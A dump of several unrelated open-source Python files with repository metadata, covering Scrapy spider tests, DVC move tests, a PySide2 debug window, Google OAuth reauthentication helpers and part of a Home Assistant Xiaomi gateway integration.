class MySpider3(Spider):
name = 'myspider3'
class MySpider3a(MySpider3):
pass
class Foo(object):
pass
class Foo2(object_ref):
pass
assert isinstance(MySpider3(), BaseSpider)
assert isinstance(MySpider3a(), BaseSpider)
assert not isinstance(Foo(), BaseSpider)
assert not isinstance(Foo2(), BaseSpider)
def test_crawl_spider(self):
assert issubclass(CrawlSpider, Spider)
assert issubclass(CrawlSpider, BaseSpider)
assert isinstance(CrawlSpider(name='foo'), Spider)
assert isinstance(CrawlSpider(name='foo'), BaseSpider)
def test_make_requests_from_url_deprecated(self):
class MySpider4(Spider):
name = 'spider1'
start_urls = ['http://example.com']
class MySpider5(Spider):
name = 'spider2'
start_urls = ['http://example.com']
def make_requests_from_url(self, url):
return Request(url + "/foo", dont_filter=True)
with warnings.catch_warnings(record=True) as w:
# spider without overridden make_requests_from_url method
# doesn't issue a warning
spider1 = MySpider4()
self.assertEqual(len(list(spider1.start_requests())), 1)
self.assertEqual(len(w), 0)
# spider with overridden make_requests_from_url issues a warning,
# but the method still works
spider2 = MySpider5()
requests = list(spider2.start_requests())
self.assertEqual(len(requests), 1)
self.assertEqual(requests[0].url, 'http://example.com/foo')
self.assertEqual(len(w), 1)
class NoParseMethodSpiderTest(unittest.TestCase):
spider_class = Spider
def test_undefined_parse_method(self):
spider = self.spider_class('example.com')
text = b'Random text'
resp = TextResponse(url="http://www.example.com/random_url", body=text)
exc_msg = 'Spider.parse callback is not defined'
with self.assertRaisesRegexp(NotImplementedError, exc_msg):
spider.parse(resp)
| 37.936575 | 140 | 0.617198 |
595b77b6995ff118a7fe08559bea55dd7bc33191 | 482 | py | Python | test_save_search.py | Concrete18/Game-Save-Manager | 9a8040bb3c9fc97dc80ed986c79cfe1ee95d106e | [
"blessing"
] | 2 | 2020-12-23T04:18:15.000Z | 2021-12-13T10:17:56.000Z | test_save_search.py | Concrete18/Game-Save-Manager | 9a8040bb3c9fc97dc80ed986c79cfe1ee95d106e | [
"blessing"
] | null | null | null | test_save_search.py | Concrete18/Game-Save-Manager | 9a8040bb3c9fc97dc80ed986c79cfe1ee95d106e | [
"blessing"
] | null | null | null | from classes.save_search import Save_Search
from classes.game import Game
import unittest
class TestBackup(unittest.TestCase):
def test_game_save_location_search(self):
'''
Game Save Search
'''
main = Save_Search(Game, 1)
path = r'C:\Users\Michael\AppData\Local\Teardown'
main.game.set('Teardown')
self.assertIn(main.game_save_location_search('Teardown', test=1), path)
if __name__ == '__main__':
unittest.main()
| 24.1 | 79 | 0.674274 |
29e1c7f1b3219ec989127cd227e6c50ca5a6fec2 | 775 | py | Python | NBA_SPORTSVU_SAMPLE_FILE/parsetest.py | ykataoka/NBA_TrajectoryAnalytics | 8cdbf9deb77bbd7e11e3447e968b154c967143be | [
"MIT"
] | null | null | null | NBA_SPORTSVU_SAMPLE_FILE/parsetest.py | ykataoka/NBA_TrajectoryAnalytics | 8cdbf9deb77bbd7e11e3447e968b154c967143be | [
"MIT"
] | null | null | null | NBA_SPORTSVU_SAMPLE_FILE/parsetest.py | ykataoka/NBA_TrajectoryAnalytics | 8cdbf9deb77bbd7e11e3447e968b154c967143be | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import xmltodict
import json
import glob
# xml = '''<?xml version="1.0"?>
# <root>
# <parent>
# <child a="foo">
# Hello, world!!
# </child>
# </parent>
# </root>
# '''
xmlfiles = glob.glob('*.XML')
xsdfiles = glob.glob('*.xsd')
print xmlfiles
print xsdfiles
if __name__ == '__main__':
for filename in xmlfiles:
str = open(filename, 'r').read()
result = xmltodict.parse(str)
print(json.dumps(result, indent=2))
print filename
raw_input()
for filename in xsdfiles:
str = open(filename, 'r').read()
result = xmltodict.parse(str)
print(json.dumps(result, indent=2))
print filename
raw_input()
# print(result)
| 19.375 | 43 | 0.565161 |
a31bf0ff37b55d3780d4f45ff3d2151f304be97f | 1,329 | py | Python | algorithmic_heights/cc/cc_logic.py | ivanyu/rosalind | b3d05347401d261bb146eef0f4c75d84562d54b0 | [
"MIT"
] | 1 | 2019-09-24T15:57:09.000Z | 2019-09-24T15:57:09.000Z | algorithmic_heights/cc/cc_logic.py | ivanyu/rosalind | b3d05347401d261bb146eef0f4c75d84562d54b0 | [
"MIT"
] | null | null | null | algorithmic_heights/cc/cc_logic.py | ivanyu/rosalind | b3d05347401d261bb146eef0f4c75d84562d54b0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def cc(graph):
def _dfs_traversal(graph, t, visited):
for v in graph[t]:
if v not in visited:
visited.add(v)
_dfs_traversal(graph, v, visited)
visited = set()
cnt = 0
for v in range(len(graph)):
if v in visited:
continue
_dfs_traversal(graph, v, visited)
cnt += 1
return cnt
if __name__ == "__main__":
import unittest
class ConnectedComponentsTestCase(unittest.TestCase):
def test_empty_graph(self):
graph = []
self.assertEqual(cc(graph), 0)
def test_one_vertex_graph(self):
graph = [[]]
self.assertEqual(cc(graph), 1)
def test_line(self):
graph = [
[1],
[0, 2],
[2, 3],
[],
]
self.assertEqual(cc(graph), 1)
def test_not_connected(self):
n = 6
graph = [[] for _ in range(n)]
self.assertEqual(cc(graph), 6)
def test_big_and_one_vertex(self):
graph = [
[1, 2],
[0, 2],
[0, 1],
[]
]
self.assertEqual(cc(graph), 2)
unittest.main()
| 22.913793 | 57 | 0.453725 |
04095fd7685da05bf5b642d34c7ea00262d5d14f | 4,875 | py | Python | qtUI/debugWindow.py | jupiterbjy/python-macro-practice | 13dec1a7d85ea7abed0ac5d42327a04a6b48a7c4 | [
"MIT"
] | 2 | 2020-10-16T23:20:27.000Z | 2021-10-11T19:55:45.000Z | qtUI/debugWindow.py | jupiterbjy/python-macro-practice | 13dec1a7d85ea7abed0ac5d42327a04a6b48a7c4 | [
"MIT"
] | null | null | null | qtUI/debugWindow.py | jupiterbjy/python-macro-practice | 13dec1a7d85ea7abed0ac5d42327a04a6b48a7c4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'debugWindow.ui'
##
## Created by: Qt User Interface Compiler version 5.14.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import (QCoreApplication, QDate, QDateTime, QMetaObject,
QObject, QPoint, QRect, QSize, QTime, QUrl, Qt)
from PySide2.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont,
QFontDatabase, QIcon, QKeySequence, QLinearGradient, QPalette, QPainter,
QPixmap, QRadialGradient)
from PySide2.QtWidgets import *
class Ui_DebugWindow(object):
def setupUi(self, DebugWindow):
if not DebugWindow.objectName():
DebugWindow.setObjectName(u"DebugWindow")
DebugWindow.resize(683, 457)
self.verticalLayout = QVBoxLayout(DebugWindow)
self.verticalLayout.setObjectName(u"verticalLayout")
self.logSaveCheck = QCheckBox(DebugWindow)
self.logSaveCheck.setObjectName(u"logSaveCheck")
self.verticalLayout.addWidget(self.logSaveCheck)
self.tabWidget = QTabWidget(DebugWindow)
self.tabWidget.setObjectName(u"tabWidget")
self.Log = QWidget()
self.Log.setObjectName(u"Log")
self.verticalLayout_3 = QVBoxLayout(self.Log)
self.verticalLayout_3.setObjectName(u"verticalLayout_3")
self.logOutput = QTextEdit(self.Log)
self.logOutput.setObjectName(u"logOutput")
self.logOutput.setStyleSheet(u"background-color: rgb(30, 30, 30);\n"
"color: rgb(230, 230, 230);\n"
"selection-color: rgb(30, 30, 30);\n"
"selection-background-color: rgb(30, 30, 30);\n"
"gridline-color: rgb(30, 30, 30);")
self.logOutput.setFrameShape(QFrame.NoFrame)
self.logOutput.setUndoRedoEnabled(False)
self.logOutput.setReadOnly(True)
self.verticalLayout_3.addWidget(self.logOutput)
self.tabWidget.addTab(self.Log, "")
self.Debug = QWidget()
self.Debug.setObjectName(u"Debug")
self.verticalLayout_2 = QVBoxLayout(self.Debug)
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.debugOutput = QTextEdit(self.Debug)
self.debugOutput.setObjectName(u"debugOutput")
self.debugOutput.setStyleSheet(u"background-color: rgb(30, 30, 30);\n"
"color: rgb(230, 230, 230);\n"
"selection-color: rgb(30, 30, 30);\n"
"selection-background-color: rgb(30, 30, 30);\n"
"gridline-color: rgb(30, 30, 30);")
self.debugOutput.setFrameShape(QFrame.NoFrame)
self.debugOutput.setUndoRedoEnabled(False)
self.debugOutput.setReadOnly(True)
self.verticalLayout_2.addWidget(self.debugOutput)
self.commandLine = QLineEdit(self.Debug)
self.commandLine.setObjectName(u"commandLine")
sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.commandLine.sizePolicy().hasHeightForWidth())
self.commandLine.setSizePolicy(sizePolicy)
self.commandLine.setMinimumSize(QSize(0, 22))
self.commandLine.setCursor(QCursor(Qt.IBeamCursor))
self.commandLine.setStyleSheet(u"background-color: rgb(30, 30, 30);\n"
"color: rgb(230, 230, 230);\n"
"selection-color: rgb(30, 30, 30);\n"
"selection-background-color: rgb(30, 30, 30);\n"
"gridline-color: rgb(30, 30, 30);")
self.commandLine.setFrame(False)
self.commandLine.setClearButtonEnabled(False)
self.verticalLayout_2.addWidget(self.commandLine)
self.tabWidget.addTab(self.Debug, "")
self.verticalLayout.addWidget(self.tabWidget)
self.retranslateUi(DebugWindow)
self.tabWidget.setCurrentIndex(0)
QMetaObject.connectSlotsByName(DebugWindow)
# setupUi
def retranslateUi(self, DebugWindow):
DebugWindow.setWindowTitle(QCoreApplication.translate("DebugWindow", u"Debugger", None))
self.logSaveCheck.setText(QCoreApplication.translate("DebugWindow", u"Save to file on Exit", None))
self.logOutput.setPlaceholderText(QCoreApplication.translate("DebugWindow", u"Standby..", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.Log), QCoreApplication.translate("DebugWindow", u"Log", None))
self.debugOutput.setPlaceholderText(QCoreApplication.translate("DebugWindow", u"Standby..", None))
self.commandLine.setInputMask("")
self.commandLine.setPlaceholderText(QCoreApplication.translate("DebugWindow", u"type 'help' for commands..", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.Debug), QCoreApplication.translate("DebugWindow", u"Debug", None))
# retranslateUi
| 43.918919 | 128 | 0.686769 |
aad2003a562d6e0dad363875fcaabbe304ed081a | 8,297 | py | Python | tests/func/test_move.py | itcarroll/dvc | 55219e9089005ac15d668ecf735aeaf31a771d0b | [
"Apache-2.0"
] | 1 | 2022-03-16T13:27:40.000Z | 2022-03-16T13:27:40.000Z | tests/func/test_move.py | itcarroll/dvc | 55219e9089005ac15d668ecf735aeaf31a771d0b | [
"Apache-2.0"
] | 41 | 2021-11-16T15:38:50.000Z | 2022-03-30T10:32:14.000Z | tests/func/test_move.py | jhhuh/dvc | fecc81e951efeaa8130264f726c27e92876422ae | [
"Apache-2.0"
] | null | null | null | import os
import textwrap
import pytest
from dvc.cli import main
from dvc.dvcfile import DVC_FILE_SUFFIX
from dvc.exceptions import DvcException, MoveNotDataSourceError
from dvc.utils.serialize import load_yaml
from tests.basic_env import TestDvc, TestDvcGit
from tests.func.test_repro import TestRepro
from tests.utils import cd
class TestMove(TestDvc):
def test(self):
dst = self.FOO + "1"
self.dvc.add(self.FOO)
self.dvc.move(self.FOO, dst)
self.assertFalse(os.path.isfile(self.FOO))
self.assertTrue(os.path.isfile(dst))
class TestMoveNonExistentFile(TestDvc):
def test(self):
with self.assertRaises(DvcException):
self.dvc.move("non_existent_file", "dst")
class TestMoveDirectory(TestDvc):
def test(self):
dst = "dst"
stages = self.dvc.add(self.DATA_DIR)
self.assertEqual(len(stages), 1)
self.assertTrue(stages[0] is not None)
self.dvc.move(self.DATA_DIR, dst)
self.assertFalse(os.path.exists(self.DATA_DIR))
self.assertTrue(os.path.exists(dst))
class TestCmdMove(TestDvc):
def test(self):
stages = self.dvc.add(self.FOO)
self.assertEqual(len(stages), 1)
self.assertTrue(stages[0] is not None)
ret = main(["move", self.FOO, self.FOO + "1"])
self.assertEqual(ret, 0)
ret = main(["move", "non-existing-file", "dst"])
self.assertNotEqual(ret, 0)
class TestMoveNotDataSource(TestRepro):
def test(self):
from dvc.repo import Repo as DvcRepo
self.dvc = DvcRepo(self._root_dir)
with self.assertRaises(MoveNotDataSourceError):
self.dvc.move(self.file1, "dst")
ret = main(["move", self.file1, "dst"])
self.assertNotEqual(ret, 0)
class TestMoveFileWithExtension(TestDvc):
def test(self):
with open(
os.path.join(self.dvc.root_dir, "file.csv"), "w", encoding="utf-8"
) as fd:
fd.write("1,2,3\n")
self.dvc.add("file.csv")
self.assertTrue(os.path.exists("file.csv"))
self.assertTrue(os.path.exists("file.csv.dvc"))
ret = main(["move", "file.csv", "other_name.csv"])
self.assertEqual(ret, 0)
self.assertFalse(os.path.exists("file.csv"))
self.assertFalse(os.path.exists("file.csv.dvc"))
self.assertTrue(os.path.exists("other_name.csv"))
self.assertTrue(os.path.exists("other_name.csv.dvc"))
class TestMoveFileToDirectory(TestDvc):
def test(self):
foo_dvc_file = self.FOO + DVC_FILE_SUFFIX
ret = main(["add", self.FOO])
self.assertEqual(ret, 0)
self.assertTrue(os.path.exists(foo_dvc_file))
new_foo_path = os.path.join(self.DATA_DIR, self.FOO)
new_foo_dvc_path = new_foo_path + DVC_FILE_SUFFIX
ret = main(["move", self.FOO, new_foo_path])
self.assertEqual(ret, 0)
self.assertFalse(os.path.exists(self.FOO))
self.assertFalse(os.path.exists(foo_dvc_file))
self.assertTrue(os.path.exists(new_foo_path))
self.assertTrue(os.path.exists(new_foo_dvc_path))
class TestMoveFileToDirectoryWithoutSpecifiedTargetName(TestDvc):
def test(self):
foo_stage_file_path = self.FOO + DVC_FILE_SUFFIX
ret = main(["add", self.FOO])
self.assertEqual(ret, 0)
self.assertTrue(os.path.exists(foo_stage_file_path))
target_foo_path = os.path.join(self.DATA_DIR, self.FOO)
target_foo_stage_file_path = target_foo_path + DVC_FILE_SUFFIX
ret = main(["move", self.FOO, self.DATA_DIR])
self.assertEqual(ret, 0)
self.assertFalse(os.path.exists(self.FOO))
self.assertFalse(os.path.exists(foo_stage_file_path))
self.assertTrue(os.path.exists(target_foo_path))
self.assertTrue(os.path.exists(target_foo_stage_file_path))
new_stage = load_yaml(target_foo_stage_file_path)
self.assertEqual(self.FOO, new_stage["outs"][0]["path"])
class TestMoveDirectoryShouldNotOverwriteExisting(TestDvcGit):
def test(self):
dir_name = "dir"
orig_listdir = set(os.listdir(self.DATA_DIR))
self.dvc.add(self.DATA_DIR)
os.mkdir(dir_name)
new_dir_name = os.path.join(dir_name, self.DATA_DIR)
self.dvc.move(self.DATA_DIR, dir_name)
data_dir_stage = self.DATA_DIR + DVC_FILE_SUFFIX
self.assertFalse(os.path.exists(self.DATA_DIR))
self.assertFalse(os.path.exists(data_dir_stage))
self.assertTrue(os.path.exists(dir_name))
self.assertEqual(
set(os.listdir(dir_name)),
{".gitignore", data_dir_stage, self.DATA_DIR},
)
self.assertTrue(os.path.exists(new_dir_name))
self.assertTrue(os.path.isfile(new_dir_name + DVC_FILE_SUFFIX))
self.assertEqual(set(os.listdir(new_dir_name)), orig_listdir)
class TestMoveFileBetweenDirectories(TestDvc):
def test(self):
data_stage_file = self.DATA + DVC_FILE_SUFFIX
ret = main(["add", self.DATA])
self.assertEqual(ret, 0)
self.assertTrue(os.path.exists(data_stage_file))
new_data_dir = "data_dir2"
os.makedirs(new_data_dir)
ret = main(["move", self.DATA, new_data_dir])
self.assertEqual(ret, 0)
new_data_path = os.path.join(new_data_dir, os.path.basename(self.DATA))
new_data_stage_file = new_data_path + DVC_FILE_SUFFIX
self.assertFalse(os.path.exists(self.DATA))
self.assertFalse(os.path.exists(data_stage_file))
self.assertTrue(os.path.exists(new_data_path))
self.assertTrue(os.path.exists(new_data_stage_file))
new_stage_file = load_yaml(new_data_stage_file)
self.assertEqual(
os.path.basename(self.DATA), new_stage_file["outs"][0]["path"]
)
class TestMoveFileInsideDirectory(TestDvc):
def test(self):
ret = main(["add", self.DATA])
self.assertEqual(ret, 0)
with cd(self.DATA_DIR):
ret = main(["move", os.path.basename(self.DATA), "data.txt"])
self.assertEqual(ret, 0)
self.assertFalse(os.path.exists(self.DATA))
data_fullpath = os.path.join(self.DATA_DIR, "data.txt")
dvc_fullpath = os.path.join(self.DATA_DIR, "data.txt.dvc")
self.assertTrue(os.path.exists(data_fullpath))
self.assertTrue(os.path.exists(dvc_fullpath))
def test_move_should_save_stage_info(tmp_dir, dvc):
tmp_dir.dvc_gen({"old_name": {"file1": "file1"}})
dvc.move("old_name", "new_name")
assert dvc.status() == {}
def test_should_move_to_dir_on_non_default_stage_file(tmp_dir, dvc):
stage_file_name = "stage.dvc"
tmp_dir.gen({"file": "file_content"})
dvc.add("file", fname=stage_file_name)
os.mkdir("directory")
dvc.move("file", "directory")
assert os.path.exists(os.path.join("directory", "file"))
def test_move_gitignored(tmp_dir, scm, dvc):
from dvc.dvcfile import FileIsGitIgnored
tmp_dir.dvc_gen({"foo": "foo"})
os.mkdir("dir")
(tmp_dir / "dir").gen(".gitignore", "*")
with pytest.raises(FileIsGitIgnored):
dvc.move("foo", "dir")
assert (tmp_dir / "foo").read_text() == "foo"
assert (tmp_dir / "foo.dvc").exists()
assert not (tmp_dir / "dir" / "foo").exists()
assert not (tmp_dir / "dir" / "foo.dvc").exists()
def test_move_output_overlap(tmp_dir, dvc):
from dvc.exceptions import OverlappingOutputPathsError
tmp_dir.dvc_gen({"foo": "foo", "dir": {"bar": "bar"}})
with pytest.raises(OverlappingOutputPathsError):
dvc.move("foo", "dir")
assert (tmp_dir / "foo").read_text() == "foo"
assert (tmp_dir / "foo.dvc").exists()
assert not (tmp_dir / "dir" / "foo").exists()
assert not (tmp_dir / "dir" / "foo.dvc").exists()
def test_move_meta(tmp_dir, dvc):
(stage,) = tmp_dir.dvc_gen("foo", "foo")
data = (tmp_dir / stage.path).parse()
data["meta"] = {"custom_key": 42}
(tmp_dir / stage.path).dump(data)
dvc.move("foo", "bar")
res = (tmp_dir / "bar.dvc").read_text()
print(res)
assert res == textwrap.dedent(
"""\
outs:
- md5: acbd18db4cc2f85cedef654fccc4a4d8
size: 3
path: bar
meta:
custom_key: 42
"""
)
| 30.616236 | 79 | 0.646258 |
c23aca342113c333521003569b3ba0896a381926 | 11,131 | py | Python | platform/bq/third_party/google_reauth/reauth.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | platform/bq/third_party/google_reauth/reauth.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | platform/bq/third_party/google_reauth/reauth.py | kustodian/google-cloud-sdk | b6bae4137d4b58030adb3dcb1271216dfb19f96d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module that provides functions for handling rapt authentication.
Reauth is a process of obtaining additional authentication (such as password,
security token, etc.) while refreshing OAuth 2.0 credentials for a user.
Credentials that use the Reauth flow must have the reauth scope,
``https://www.googleapis.com/auth/accounts.reauth``.
This module provides a high-level function for executing the Reauth process,
:func:`refresh_access_token`, and lower-level helpers for doing the individual
steps of the reauth process.
Those steps are:
1. Obtaining a list of challenges from the reauth server.
2. Running through each challenge and sending the result back to the reauth
server.
3. Refreshing the access token using the returned rapt token.
"""
import json
import sys
from six.moves import http_client
from google_reauth import challenges
from google_reauth import errors
from google_reauth import _helpers
from google_reauth import _reauth_client
_REAUTH_SCOPE = 'https://www.googleapis.com/auth/accounts.reauth'
_REAUTH_NEEDED_ERROR = 'invalid_grant'
_REAUTH_NEEDED_ERROR_INVALID_RAPT = 'invalid_rapt'
_REAUTH_NEEDED_ERROR_RAPT_REQUIRED = 'rapt_required'
_AUTHENTICATED = 'AUTHENTICATED'
_CHALLENGE_REQUIRED = 'CHALLENGE_REQUIRED'
_CHALLENGE_PENDING = 'CHALLENGE_PENDING'
def _run_next_challenge(msg, http_request, access_token):
"""Get the next challenge from msg and run it.
Args:
msg: Reauth API response body (either from the initial request to
https://reauth.googleapis.com/v2/sessions:start or from sending the
previous challenge response to
https://reauth.googleapis.com/v2/sessions/id:continue)
http_request: callable to run http requests. Accepts uri, method, body
and headers. Returns a tuple: (response, content)
access_token: reauth access token
Returns: rapt token.
Raises:
errors.ReauthError if reauth failed
"""
for challenge in msg['challenges']:
if challenge['status'] != 'READY':
# Skip non-activated challneges.
continue
c = challenges.AVAILABLE_CHALLENGES.get(
challenge['challengeType'], None)
if not c:
raise errors.ReauthFailError(
'Unsupported challenge type {0}. Supported types: {0}'
.format(
challenge['challengeType'],
','.join(challenges.AVAILABLE_CHALLENGES.keys())))
if not c.is_locally_eligible:
raise errors.ReauthFailError(
'Challenge {0} is not locally eligible'
.format(challenge['challengeType']))
client_input = c.obtain_challenge_input(challenge)
if not client_input:
return None
return _reauth_client.send_challenge_result(
http_request,
msg['sessionId'],
challenge['challengeId'],
client_input,
access_token)
return None
def _obtain_rapt(http_request, access_token, requested_scopes, rounds_num=5):
"""Given an http request method and reauth access token, get rapt token.
Args:
http_request: callable to run http requests. Accepts uri, method, body
and headers. Returns a tuple: (response, content)
access_token: reauth access token
requested_scopes: scopes required by the client application
rounds_num: max number of attempts to get a rapt after the next
challenge, before failing the reauth. This defines total number of
challenges + number of additional retries if the chalenge input
wasn't accepted.
Returns: rapt token.
Raises:
errors.ReauthError if reauth failed
"""
msg = None
for _ in range(0, rounds_num):
if not msg:
msg = _reauth_client.get_challenges(
http_request,
list(challenges.AVAILABLE_CHALLENGES.keys()),
access_token,
requested_scopes)
if msg['status'] == _AUTHENTICATED:
return msg['encodedProofOfReauthToken']
if not (msg['status'] == _CHALLENGE_REQUIRED or
msg['status'] == _CHALLENGE_PENDING):
raise errors.ReauthAPIError(
'Challenge status {0}'.format(msg['status']))
if not _helpers.is_interactive():
raise errors.ReauthUnattendedError()
msg = _run_next_challenge(msg, http_request, access_token)
# If we got here it means we didn't get authenticated.
raise errors.ReauthFailError()
def get_rapt_token(http_request, client_id, client_secret, refresh_token,
token_uri, scopes=None):
"""Given an http request method and refresh_token, get rapt token.
Args:
http_request: callable to run http requests. Accepts uri, method, body
and headers. Returns a tuple: (response, content)
client_id: client id to get access token for reauth scope.
client_secret: client secret for the client_id
refresh_token: refresh token to refresh access token
token_uri: uri to refresh access token
scopes: scopes required by the client application
Returns: rapt token.
Raises:
errors.ReauthError if reauth failed
"""
sys.stderr.write('Reauthentication required.\n')
# Get access token for reauth.
response, content = _reauth_client.refresh_grant(
http_request=http_request,
client_id=client_id,
client_secret=client_secret,
refresh_token=refresh_token,
token_uri=token_uri,
scopes=_REAUTH_SCOPE,
headers={'Content-Type': 'application/x-www-form-urlencoded'})
try:
content = json.loads(content)
except (TypeError, ValueError):
raise errors.ReauthAccessTokenRefreshError(
'Invalid response {0}'.format(_substr_for_error_message(content)))
if response.status != http_client.OK:
raise errors.ReauthAccessTokenRefreshError(
_get_refresh_error_message(content), response.status)
if 'access_token' not in content:
raise errors.ReauthAccessTokenRefreshError(
'Access token missing from the response')
# Get rapt token from reauth API.
rapt_token = _obtain_rapt(
http_request,
content['access_token'],
requested_scopes=scopes)
return rapt_token
def _rapt_refresh_required(content):
"""Checks if the rapt refresh is required.
Args:
content: refresh response content
Returns:
True if rapt refresh is required.
"""
try:
content = json.loads(content)
except (TypeError, ValueError):
return False
return (
content.get('error') == _REAUTH_NEEDED_ERROR and
(content.get('error_subtype') == _REAUTH_NEEDED_ERROR_INVALID_RAPT or
content.get('error_subtype') == _REAUTH_NEEDED_ERROR_RAPT_REQUIRED))
def _get_refresh_error_message(content):
"""Constructs an error from the http response.
Args:
response: http response
content: parsed response content
Returns:
error message to show
"""
error_msg = 'Invalid response.'
if 'error' in content:
error_msg = content['error']
if 'error_description' in content:
error_msg += ': ' + content['error_description']
return error_msg
def _substr_for_error_message(content):
"""Returns content string to include in the error message"""
return content if len(content) <= 100 else content[0:97] + "..."
def refresh_access_token(
http_request, client_id, client_secret, refresh_token,
token_uri, rapt=None, scopes=None, headers=None):
"""Refresh the access_token using the refresh_token.
Args:
http_request: callable to run http requests. Accepts uri, method, body
and headers. Returns a tuple: (response, content)
client_id: client id to get access token for reauth scope.
client_secret: client secret for the client_id
refresh_token: refresh token to refresh access token
token_uri: uri to refresh access token
scopes: scopes required by the client application
Returns:
Tuple[str, str, str, Optional[str], Optional[str], Optional[str]]: The
rapt token, the access token, new refresh token, expiration,
token id and response content returned by the token endpoint.
Raises:
errors.ReauthError if reauth failed
errors.HttpAccessTokenRefreshError it access token refresh failed
"""
response, content = _reauth_client.refresh_grant(
http_request=http_request,
client_id=client_id,
client_secret=client_secret,
refresh_token=refresh_token,
token_uri=token_uri,
rapt=rapt,
headers=headers)
if response.status != http_client.OK:
# Check if we need a rapt token or if the rapt token is invalid.
# Once we refresh the rapt token, retry the access token refresh.
# If we did refresh the rapt token and still got an error, then the
# refresh token is expired or revoked.
if (_rapt_refresh_required(content)):
rapt = get_rapt_token(
http_request,
client_id,
client_secret,
refresh_token,
token_uri,
scopes=scopes,
)
# retry with refreshed rapt
response, content = _reauth_client.refresh_grant(
http_request=http_request,
client_id=client_id,
client_secret=client_secret,
refresh_token=refresh_token,
token_uri=token_uri,
rapt=rapt,
headers=headers)
try:
content = json.loads(content)
except (TypeError, ValueError):
raise errors.HttpAccessTokenRefreshError(
'Invalid response {0}'.format(_substr_for_error_message(content)),
response.status)
if response.status != http_client.OK:
raise errors.HttpAccessTokenRefreshError(
_get_refresh_error_message(content), response.status)
access_token = content['access_token']
refresh_token = content.get('refresh_token', None)
expires_in = content.get('expires_in', None)
id_token = content.get('id_token', None)
return rapt, content, access_token, refresh_token, expires_in, id_token
| 35.5623 | 79 | 0.670021 |
79043cf41aa29b5fb39b3b7e7cd4edd485a95348 | 8,812 | py | Python | custom_components/xiaomi_gateway3/__init__.py | avbor/HomeAssistantConf | 1f0fe16c8e3f3dcea7cc350f3fb9c233b6a22614 | [
"Unlicense"
] | 35 | 2021-02-25T06:30:42.000Z | 2022-03-09T20:18:47.000Z | custom_components/xiaomi_gateway3/__init__.py | avbor/HomeAssistantConf | 1f0fe16c8e3f3dcea7cc350f3fb9c233b6a22614 | [
"Unlicense"
] | 33 | 2021-11-22T16:30:43.000Z | 2022-03-29T18:00:13.000Z | custom_components/xiaomi_gateway3/__init__.py | avbor/HomeAssistantConf | 1f0fe16c8e3f3dcea7cc350f3fb9c233b6a22614 | [
"Unlicense"
] | 19 | 2021-02-20T05:29:58.000Z | 2022-02-05T16:22:30.000Z | import asyncio
import logging
import voluptuous as vol
from homeassistant.components.system_log import CONF_LOGGER
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
from homeassistant.core import HomeAssistant, Event
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.aiohttp_client import async_create_clientsession
from homeassistant.helpers.entity_registry import EntityRegistry
from homeassistant.helpers.storage import Store
from .core import logger
from .core.gateway3 import Gateway3
from .core.helpers import DevicesRegistry
from .core.utils import DOMAIN, XiaomiGateway3Debug
from .core.xiaomi_cloud import MiCloud
_LOGGER = logging.getLogger(__name__)
DOMAINS = ['binary_sensor', 'climate', 'cover', 'light', 'remote', 'sensor',
'switch', 'alarm_control_panel']
CONF_DEVICES = 'devices'
CONF_ATTRIBUTES_TEMPLATE = 'attributes_template'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Optional(CONF_DEVICES): {
cv.string: vol.Schema({
vol.Optional('occupancy_timeout'): cv.positive_int,
}, extra=vol.ALLOW_EXTRA),
},
CONF_LOGGER: logger.CONFIG_SCHEMA,
vol.Optional(CONF_ATTRIBUTES_TEMPLATE): cv.template
}, extra=vol.ALLOW_EXTRA),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass: HomeAssistant, hass_config: dict):
config = hass_config.get(DOMAIN) or {}
if CONF_LOGGER in config:
logger.init(__name__, config[CONF_LOGGER], hass.config.config_dir)
info = await hass.helpers.system_info.async_get_system_info()
_LOGGER.debug(f"SysInfo: {info}")
# update global debug_mode for all gateways
if 'debug_mode' in config[CONF_LOGGER]:
setattr(Gateway3, 'debug_mode', config[CONF_LOGGER]['debug_mode'])
if CONF_DEVICES in config:
for k, v in config[CONF_DEVICES].items():
# AA:BB:CC:DD:EE:FF => aabbccddeeff
k = k.replace(':', '').lower()
DevicesRegistry.defaults[k] = v
hass.data[DOMAIN] = {
CONF_ATTRIBUTES_TEMPLATE: config.get(CONF_ATTRIBUTES_TEMPLATE)
}
await _handle_device_remove(hass)
# utils.migrate_unique_id(hass)
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Support two kind of enties - MiCloud and Gateway."""
# entry for MiCloud login
if 'servers' in entry.data:
return await _setup_micloud_entry(hass, entry)
# migrate data (also after first setup) to options
if entry.data:
hass.config_entries.async_update_entry(entry, data={},
options=entry.data)
await _setup_logger(hass)
# add options handler
if not entry.update_listeners:
entry.add_update_listener(async_update_options)
hass.data[DOMAIN][entry.entry_id] = Gateway3(**entry.options)
hass.async_create_task(_setup_domains(hass, entry))
return True
async def async_update_options(hass: HomeAssistant, entry: ConfigEntry):
